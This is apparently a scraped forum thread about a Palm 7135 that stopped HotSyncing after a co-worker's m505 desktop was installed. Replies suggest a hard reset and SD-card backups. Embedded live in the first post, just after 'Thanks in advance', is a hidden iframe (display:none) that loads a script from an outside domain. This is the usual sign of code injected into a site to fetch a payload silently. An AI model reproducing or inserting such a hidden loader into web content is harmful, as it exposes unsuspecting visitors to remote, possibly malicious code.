+ Reply to Thread

HOTSYNC question

I hope this has not been asked as I did do a search previously. I currently have been syncing my 7135 at my office and at home. I might add without any difficulty. Unfortunately, when I got to work one of my employees decided to take it upon herself to try to sync her non-syncing m505 to my perfectally configured palm desktop. Not only did she just plug the darn cradle in but she had teh nerve to load her m505 desktop in as well. I am rather irritated, not only has she used one of my computers for her stuff but caused mine to stop working. I spent about a hour deleting her GARBAGE and had to re load in the 7135 desktop, for some reason mine was not syncing with the native palm desktop. Well needless to say, I went to sync with my home PC and this time I got a palm freeze and that reverse screen. I had to uninstall the palm desktop ans well as several soft resets, but no inprovement. I looked at the hotsync prefs, changed USB ports, everything shour of a hard reset, which I am trying to avoid. Any help would be great.

Thanks in advance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Marc Chasin, MD

Administrator
    hard reset. delet the saved prefs and rename yuour old backup folder. when yur phone syncs for the first time after the reset, it will generate a new backup folder...

If I do that at home will I also have to do the same at the office, creating a endless circle??
    Marc Chasin, MD

Originally posted by 1stcare
    If I do that at home will I also have to do the same at the office, creating a endless circle??
    I guess you aren't backing up to a SD card that you can restore a clean 7135 configuration? It sounds like from what you're describing you really don't have much choice other than to do a hard reset and start over again.
    Please visit my picture site: Robert-O-Rama :)

Robert, you hit on an issue that's been forming in my pea brain for a while-- if you back up to a SD card, aren't you saving the same trouble that caused the problem in the first place? Forgive me, I no understand.

That depends, Ogakor. 1stcare's problem was not caused by his software but by a co-worker. Backupbuddy after a hard reset, then have handheld overwrite everything on the desktop should fix that problem good.

Presumably you are backuping before you make significant software changes, and can thus a restore would not be affected by buggy installs.

Plus, I will be backuping prior to installing any of the software which has caused problems for others here (just in case the the desktop data gets messed up too).
    ---------------
    The same thing we do every night, Pinky...

Originally posted by BrerLapn
    Presumably you are backuping before you make significant software changes...
    D'oh! Thank you.